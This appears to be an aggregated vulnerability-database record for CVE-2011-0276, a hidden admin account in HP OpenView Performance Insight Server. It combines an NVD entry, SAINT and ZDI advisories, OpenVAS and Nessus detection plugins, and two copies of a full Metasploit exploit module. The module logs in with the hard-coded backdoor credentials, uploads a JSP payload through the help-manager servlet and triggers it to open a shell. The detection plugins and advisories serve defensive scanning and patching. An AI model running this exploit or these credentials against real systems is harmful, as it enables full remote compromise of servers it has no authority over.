{"cve": [{"lastseen": "2018-10-11T11:34:41", "bulletinFamily": "NVD", "description": "HP OpenView Performance Insight Server 5.2, 5.3, 5.31, 5.4, and 5.41 contains a \"hidden account\" in the com.trinagy.security.XMLUserManager Java class, which allows remote attackers to execute arbitrary code via the doPost method in the com.trinagy.servlet.HelpManagerServlet class.", "modified": "2018-10-10T16:09:29", "published": "2011-02-01T20:00:06", "id": "CVE-2011-0276", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0276", "title": "CVE-2011-0276", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-11-01T13:51:25", "bulletinFamily": "exploit", "description": "This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java class. When using this account, an attacker can abuse the com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system allowing the execution of arbitrary code. NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0", "modified": "2018-08-20T21:05:58", "published": "2011-03-15T21:22:07", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_OPENVIEW_INSIGHT_BACKDOOR", "href": "", "type": "metasploit", "title": "HP OpenView Performance Insight Server Backdoor Account Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP OpenView Performance Insight Server Backdoor Account Code Execution',\n 'Description' => %q{\n This module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\n class. 
When using this account, an attacker can abuse the\n com.trinagy.servlet.HelpManagerServlet class and write arbitrary files to the system\n allowing the execution of arbitrary code.\n\n NOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Privileged' => true,\n 'References' =>\n [\n [ 'CVE', '2011-0276' ],\n [ 'OSVDB', '70754' ],\n ],\n 'Targets' =>\n [\n [ 'Universal Windows Target',\n {\n 'Arch' => ARCH_JAVA,\n 'Payload' =>\n {\n 'DisableNops' => true,\n },\n }\n ],\n ],\n 'DefaultOptions' =>\n {\n 'SHELL' => 'cmd.exe'\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jan 31 2011'))\n\n register_options(\n [\n OptString.new('USERNAME', [ true, 'The username to authenticate as', 'hch908v' ]),\n OptString.new('PASSWORD', [ true, 'The password for the specified username', 'z6t0j$+i' ])\n ])\n\n end\n\n def exploit\n\n creds = \"#{datastore['USERNAME']}\" + \":\" + \"#{datastore['PASSWORD']}\"\n\n dir = rand_text_alpha_upper(rand(8) + 1)\n page = rand_text_alpha_upper(8) + \".jsp\"\n uid = rand(20).to_s\n\n file = \"-----------------------------#{uid}\\r\\n\"\n file << \"Content-Disposition: form-data; name=\\\"filename\\\"; filename=\\\"#{page}\\\"\\r\\n\"\n file << \"Content-Type: application/x-java-archive\\r\\n\\r\\n\"\n file << payload.encoded + \"\\r\\n\"\n file << \"-----------------------------#{uid}\\r\\n\"\n # if (p.getName().equals(\"location\")); ...\n file << \"Content-Disposition: form-data; name=\\\"location\\\"\\r\\n\"\n file << \"Content-Type: text/plain\\r\\n\\r\\n\"\n file << dir + \"\\r\\n\"\n file << \"-----------------------------#{uid}\\r\\n\\r\\n\"\n\n print_status(\"Sending our POST request...\")\n\n res = send_request_cgi(\n {\n 'uri'\t\t=> \"/reports/helpmanager\",\n 'version'\t=> '1.1',\n 'method'\t=> 'POST',\n 'ctype' => 'multipart/form-data; boundary=---------------------------' + uid,\n 'data'\t\t=> file,\n 
'headers'\t=>\n {\n=begin\nthis.internal = new User(\"hch908v\");\nthis.internal.setName(\"hidden user\");\nthis.internal.setEncryptedPassword(TrendCrypt.crypt(\"hch908v\", \"z6t0j$+i\"));\nthis.internal.addRole(\"user\");\nthis.internal.addRole(\"admin\");\n=end\n 'Authorization' => \"Basic #{Rex::Text.encode_base64(creds)}\",\n\n }\n }, 5)\n\n if ( res and res.code == 200 )\n print_good(\"Login/Upload successful. Triggering payload at '/help/#{dir}/#{page}'...\")\n send_request_raw({\n 'uri'\t\t=> \"/help/#{dir}/#{page}\",\n 'method'\t=> 'GET',\n 'version'\t=> '1.0',\n }, 5)\n\n handler\n else\n print_error(\"Login/Upload refused!\")\n return\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/hp_openview_insight_backdoor.rb"}], "exploitdb": [{"lastseen": "2016-02-02T06:57:29", "bulletinFamily": "exploit", "description": "HP OpenView Performance Insight Server Backdoor Account Code Execution. CVE-2011-0276. Remote exploit for windows platform", "modified": "2011-03-15T00:00:00", "published": "2011-03-15T00:00:00", "id": "EDB-ID:16984", "href": "https://www.exploit-db.com/exploits/16984/", "type": "exploitdb", "title": "HP OpenView Performance Insight Server Backdoor Account Code Execution", "sourceData": "##\r\n# $Id: hp_openview_insight_backdoor.rb 11969 2011-03-15 21:56:11Z swtornio $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Performance Insight Server Backdoor Account Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a hidden account in the com.trinagy.security.XMLUserManager Java\r\n\t\t\t\tclass. When using this account, an attacker can abuse the \r\n\t\t\t\tcom.trinagy.servlet.HelpManagerServlet class and write arbitary files to the system \r\n\t\t\t\tallowing the execution of arbitary code.\r\n\r\n\t\t\t\tNOTE: This module has only been tested against HP OpenView Performance Insight Server 5.41.0\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 11969 $',\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-0276' ],\r\n\t\t\t\t\t[ 'OSVDB', '70754' ],\r\n\t\t\t\t],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Universal Windows Target',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t\t'Payload' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t\t\t\t},\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 31 2011'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t\tOptString.new('USERNAME', [ false, 'The username to authenticate as', 'hch908v' ]),\r\n\t\t\t\tOptString.new('PASSWORD', [ false, 'The password for the specified username', 'z6t0j$+i' ])\r\n\t\t\t], self.class )\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tcreds = 
\"#{datastore['USERNAME']}\" + \":\" + \"#{datastore['PASSWORD']}\"\r\n\r\n\t\tdir = rand_text_alpha_upper(rand(8) + 1)\r\n\t\tpage = rand_text_alpha_upper(8) + \".jsp\"\r\n\t\tuid = rand(20).to_s\r\n\r\n\t\tfile = \"-----------------------------#{uid}\\r\\n\"\r\n\t\tfile << \"Content-Disposition: form-data; name=\\\"filename\\\"; filename=\\\"#{page}\\\"\\r\\n\"\r\n\t\tfile << \"Content-Type: application/x-java-archive\\r\\n\\r\\n\"\r\n\t\tfile << payload.encoded + \"\\r\\n\"\r\n\t\tfile << \"-----------------------------#{uid}\\r\\n\"\r\n\t\t# if (p.getName().equals(\"location\")); ...\r\n\t\tfile << \"Content-Disposition: form-data; name=\\\"location\\\"\\r\\n\"\r\n\t\tfile << \"Content-Type: text/plain\\r\\n\\r\\n\"\r\n\t\tfile << dir + \"\\r\\n\"\r\n\t\tfile << \"-----------------------------#{uid}\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Sending our POST request...\")\r\n\r\n\t\tres = send_request_cgi(\r\n\t\t\t{\r\n\t\t\t\t'uri'\t\t=> \"/reports/helpmanager\",\r\n\t\t\t\t'version'\t=> '1.1',\r\n\t\t\t\t'method'\t=> 'POST',\r\n\t\t\t\t'ctype' => 'multipart/form-data; boundary=---------------------------' + uid,\r\n\t\t\t\t'data'\t\t=> file,\r\n\t\t\t\t'headers'\t=>\r\n\t\t\t\t\t{\r\n=begin\r\nthis.internal = new User(\"hch908v\");\r\nthis.internal.setName(\"hidden user\");\r\nthis.internal.setEncryptedPassword(TrendCrypt.crypt(\"hch908v\", \"z6t0j$+i\"));\r\nthis.internal.addRole(\"user\");\r\nthis.internal.addRole(\"admin\");\r\n=end\r\n\t\t\t\t\t\t'Authorization' => \"Basic #{Rex::Text.encode_base64(creds)}\",\r\n\r\n\t\t\t\t\t}\r\n\t\t\t}, 5)\r\n\t\t\r\n\t\tif ( res and res.code == 200 )\r\n\t\t\tprint_status(\"Login/Upload successful. 
Triggering payload at '/help/#{dir}/#{page}'...\")\r\n\t\t\tsend_request_raw({\r\n\t\t\t\t\t'uri'\t\t=> \"/help/#{dir}/#{page}\",\r\n\t\t\t\t\t'method'\t=> 'GET',\r\n\t\t\t\t\t'version'\t=> '1.0',\r\n\t\t\t}, 5)\r\n\r\n\t\t\thandler\r\n\t\telse\r\n\t\t\tprint_error(\"Login/Upload refused!\")\r\n\t\t\treturn\r\n\t\tend\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16984/"}], "saint": [{"lastseen": "2018-08-31T00:08:18", "bulletinFamily": "exploit", "description": "Added: 03/03/2011 \nCVE: [CVE-2011-0276](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0276>) \nBID: [46079](<http://www.securityfocus.com/bid/46079>) \nOSVDB: [70754](<http://www.osvdb.org/70754>) \n\n\n### Background\n\nHP OpenView Performance Insight (OVPI) Server is a management utility that monitors and reports on the performance of services. \n\n### Problem\n\nA backdoor account may allow an attacker to execute arbitrary code on the system. \n\n### Resolution\n\nApply patch [5.41.002 piweb HF02](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453>). \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453> \n<http://secunia.com/advisories/43145> \n<http://osvdb.org/70754> \n<http://www.securityfocus.com/bid/46079> \n\n\n### Limitations\n\nThis exploit works against HP OpenView Performance Insight (OVPI) 5.41.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP1 English (DEP OptOut). 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-03-03T00:00:00", "published": "2011-03-03T00:00:00", "id": "SAINT:3582F99C02FED42EFF486320A1B28D87", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_ovpi_server_backdoor", "title": "HP OpenView Performance Insight Server Backdoor Account", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-14T16:58:03", "bulletinFamily": "exploit", "description": "Added: 03/03/2011 \nCVE: [CVE-2011-0276](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0276>) \nBID: [46079](<http://www.securityfocus.com/bid/46079>) \nOSVDB: [70754](<http://www.osvdb.org/70754>) \n\n\n### Background\n\nHP OpenView Performance Insight (OVPI) Server is a management utility that monitors and reports on the performance of services. \n\n### Problem\n\nA backdoor account may allow an attacker to execute arbitrary code on the system. \n\n### Resolution\n\nApply patch [5.41.002 piweb HF02](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453>). \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453> \n<http://secunia.com/advisories/43145> \n<http://osvdb.org/70754> \n<http://www.securityfocus.com/bid/46079> \n\n\n### Limitations\n\nThis exploit works against HP OpenView Performance Insight (OVPI) 5.41.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP1 English (DEP OptOut). 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-03-03T00:00:00", "published": "2011-03-03T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_ovpi_server_backdoor", "id": "SAINT:EDEA47E1E827D075C2146A728AAD9C48", "title": "HP OpenView Performance Insight Server Backdoor Account", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-10-03T15:02:00", "bulletinFamily": "exploit", "description": "Added: 03/03/2011 \nCVE: [CVE-2011-0276](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0276>) \nBID: [46079](<http://www.securityfocus.com/bid/46079>) \nOSVDB: [70754](<http://www.osvdb.org/70754>) \n\n\n### Background\n\nHP OpenView Performance Insight (OVPI) Server is a management utility that monitors and reports on the performance of services. \n\n### Problem\n\nA backdoor account may allow an attacker to execute arbitrary code on the system. \n\n### Resolution\n\nApply patch [5.41.002 piweb HF02](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453>). \n\n### References\n\n<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453> \n<http://secunia.com/advisories/43145> \n<http://osvdb.org/70754> \n<http://www.securityfocus.com/bid/46079> \n\n\n### Limitations\n\nThis exploit works against HP OpenView Performance Insight (OVPI) 5.41.0 on Windows Server 2003 SP2 English (DEP OptOut) and Windows Server 2008 SP1 English (DEP OptOut). 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-03-03T00:00:00", "published": "2011-03-03T00:00:00", "id": "SAINT:5EC75B2A869099E2347B980D90EADB02", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_ovpi_server_backdoor", "type": "saint", "title": "HP OpenView Performance Insight Server Backdoor Account", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-09-04T14:19:33", "bulletinFamily": "scanner", "description": "HP OpenView Performance Insight Server is prone to a remote\ncode-execution vulnerability.\n\nAn attacker can exploit this issue to execute arbitrary code with\nSYSTEM-level privileges. Successful exploits will completely compromise\naffected computers.", "modified": "2017-09-01T00:00:00", "published": "2011-02-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=103060", "id": "OPENVAS:103060", "title": "HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hp_performance_insight_46079.nasl 7044 2017-09-01 11:50:59Z teissa $\n#\n# HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"HP OpenView Performance Insight Server is prone to a remote\ncode-execution vulnerability.\n\nAn attacker can exploit this issue to execute arbitrary code with\nSYSTEM-level privileges. Successful exploits will completely compromise\naffected computers.\";\n\ntag_solution = \"Updates are available. Please see the references for details.\";\n\nif (description)\n{\n script_xref(name : \"URL\" , value : \"https://www.securityfocus.com/bid/46079\");\n script_xref(name : \"URL\" , value : \"http://www.hp.com/\");\n script_xref(name : \"URL\" , value : \"http://www.zerodayinitiative.com/advisories/ZDI-11-034/\");\n script_xref(name : \"URL\" , value : \"http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453\");\n script_id(103060);\n script_version(\"$Revision: 7044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-01 13:50:59 +0200 (Fri, 01 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-03 16:40:04 +0100 (Thu, 03 Feb 2011)\");\n script_bugtraq_id(46079);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0276\");\n\n script_name(\"HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_hp_performance_insight_detect.nasl\");\n 
script_require_ports(\"Services/www\", 8080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default:8080);\nif(!get_port_state(port))exit(0);\n\nif(!get_dir_from_kb(port:port,app:\"hp_openview_insight\"))exit(0);\n\nuserpass = \"hch908v:z6t0j$+i\";\n\nurl = \"/reports/home?context=home&type=header&ov_user=hch908v\";\n\nreq = string(\"GET \", url,\" HTTP/1.1\\r\\n\", \"Host: \", get_host_name(),\"\\r\\n\\r\\n\");\nresp = http_keepalive_send_recv(port:port, data:req);\nif(\"401 Unauthorized\" >!< resp)exit(0); # just to be sure\n\nuserpass64 = base64(str:userpass);\n\nreq = string(\"GET \", url,\" HTTP/1.1\\r\\n\",\n\t \"Host: \", get_host_name(),\"\\r\\n\",\n\t \"Authorization: Basic \",userpass64,\"\\r\\n\",\n\t \"\\r\\n\");\nresp = http_keepalive_send_recv(port:port, data:req);\n\nif(\"Log off hch908v\" >< resp && \"Administration</a>\" >< resp) {\n msg = string(\"The Scanner was able to access the URL '\",url, \"'\\nusing username 'hch908v' and password 'z6t0j$+i'.\\n\");\n security_message(port:port,data:msg);\n exit(0);\n} \n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:44:22", "bulletinFamily": "scanner", "description": "HP OpenView Performance Insight Server is prone to a remote\ncode-execution vulnerability.\n\nAn attacker can exploit this issue to execute arbitrary code with\nSYSTEM-level privileges. 
Successful exploits will completely compromise\naffected computers.", "modified": "2018-10-22T00:00:00", "published": "2011-02-03T00:00:00", "id": "OPENVAS:1361412562310103060", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103060", "title": "HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hp_performance_insight_46079.nasl 12006 2018-10-22 07:42:16Z mmartin $\n#\n# HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/46079\");\n script_xref(name:\"URL\", value:\"http://www.hp.com/\");\n script_xref(name:\"URL\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-11-034/\");\n script_xref(name:\"URL\", value:\"http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.103060\");\n script_version(\"$Revision: 12006 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 09:42:16 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-02-03 16:40:04 +0100 (Thu, 03 Feb 2011)\");\n script_bugtraq_id(46079);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0276\");\n\n script_name(\"HP OpenView Performance Insight Server 'doPost()' Remote Arbitrary Code Execution Vulnerability\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_hp_performance_insight_detect.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"solution\", value:\"Updates are available. 
Please see the references for details.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"HP OpenView Performance Insight Server is prone to a remote\ncode-execution vulnerability.\n\nAn attacker can exploit this issue to execute arbitrary code with\nSYSTEM-level privileges. Successful exploits will completely compromise\naffected computers.\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port(default:8080);\nif(!get_port_state(port))exit(0);\n\nif(!get_dir_from_kb(port:port,app:\"hp_openview_insight\"))exit(0);\n\nuserpass = \"hch908v:z6t0j$+i\";\n\nurl = \"/reports/home?context=home&type=header&ov_user=hch908v\";\n\nreq = string(\"GET \", url,\" HTTP/1.1\\r\\n\", \"Host: \", get_host_name(),\"\\r\\n\\r\\n\");\nresp = http_keepalive_send_recv(port:port, data:req);\nif(\"401 Unauthorized\" >!< resp)exit(0); # just to be sure\n\nuserpass64 = base64(str:userpass);\n\nreq = string(\"GET \", url,\" HTTP/1.1\\r\\n\",\n\t \"Host: \", get_host_name(),\"\\r\\n\",\n\t \"Authorization: Basic \",userpass64,\"\\r\\n\",\n\t \"\\r\\n\");\nresp = http_keepalive_send_recv(port:port, data:req);\n\nif(\"Log off hch908v\" >< resp && \"Administration</a>\" >< resp) {\n msg = string(\"The Scanner was able to access the URL '\",url, \"'\\nusing username 'hch908v' and password 'z6t0j$+i'.\\n\");\n security_message(port:port,data:msg);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:11:42", "bulletinFamily": "scanner", "description": "Nessus was able to log into the remote HP OpenView Performance Insight\nsystem using a hidden account. 
The 'hch908v' user, hard-coded in the\n'com.trinagy.security.XMLUserManager' class, is hidden and has\nadministrative privileges.\n\nA remote attacker could exploit this by logging in as the hidden user\nand gain administrative access to the Performance Insight\ninstallation.\n\nAfter gaining administrative access to the web application, escalation\nof privileges may be possible. Nessus has not checked for that issue.", "modified": "2018-11-15T00:00:00", "published": "2011-02-02T00:00:00", "id": "HP_OPENVIEW_PERF_INSIGHT_BACKDOOR.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51850", "title": "HP OpenView Performance Insight Server Backdoor Account", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(51850);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\n\n script_cve_id(\"CVE-2011-0276\");\n script_bugtraq_id(46079);\n script_xref(name:\"EDB-ID\", value:\"16984\");\n script_xref(name:\"Secunia\", value:\"43145\");\n\n script_name(english:\"HP OpenView Performance Insight Server Backdoor Account\");\n script_summary(english:\"Tries to login to the hidden hch908v account\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"It is possible to log on the remote web application by using a hidden\naccount.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Nessus was able to log into the remote HP OpenView Performance Insight\nsystem using a hidden account. The 'hch908v' user, hard-coded in the\n'com.trinagy.security.XMLUserManager' class, is hidden and has\nadministrative privileges.\n\nA remote attacker could exploit this by logging in as the hidden user\nand gain administrative access to the Performance Insight\ninstallation.\n\nAfter gaining administrative access to the web application, escalation\nof privileges may be possible. 
Nessus has not checked for that issue.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-034/\");\n # http://web.archive.org/web/20130318065946/http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02695453\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84978b0a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the hotfix referenced in the HP advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Performance Insight Server Backdoor Account Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:openview_performance_insight\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"hp_openview_perf_insight_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/hp_ovpi\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:'hp_ovpi', port:port, exit_on_fail:TRUE);\n\nuser = 'hch908v';\npass = 'z6t0j$+i';\nurl = install['dir'] + '/reports/home?context=home&type=header';\nres = http_send_recv3(\n method:'GET',\n item:url,\n port:port,\n username:user,\n password:pass,\n exit_on_fail:TRUE\n);\n\nif ('Log off ' + user + '</a>' >< res[2])\n{\n if (report_verbosity > 0)\n {\n header = 'Nessus accessed the following URL as the hidden user';\n trailer =\n ' Username : ' + user + '\\n' +\n ' Password : ' + pass;\n report = get_vuln_report(items:url, port:port, header:header, trailer:trailer);\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n{\n base_url = build_url(qs:install['dir'], port:port);\n exit(0, 'The HP OVPI install at ' + base_url + ' is not affected.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:18:01", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Performance Insight Server. Authentication is not required to exploit this vulnerability.\n\nThe specific vulnerability is due to a hidden account present within the com.trinagy.security.XMLUserManager Java class. Using this account a malicious user can access the com.trinagy.servlet.HelpManagerServlet class. This is defined within the piweb.jar file installed with Performance Insight. This class exposes a doPost() method which an attacker can use to upload malicious files to the server. 
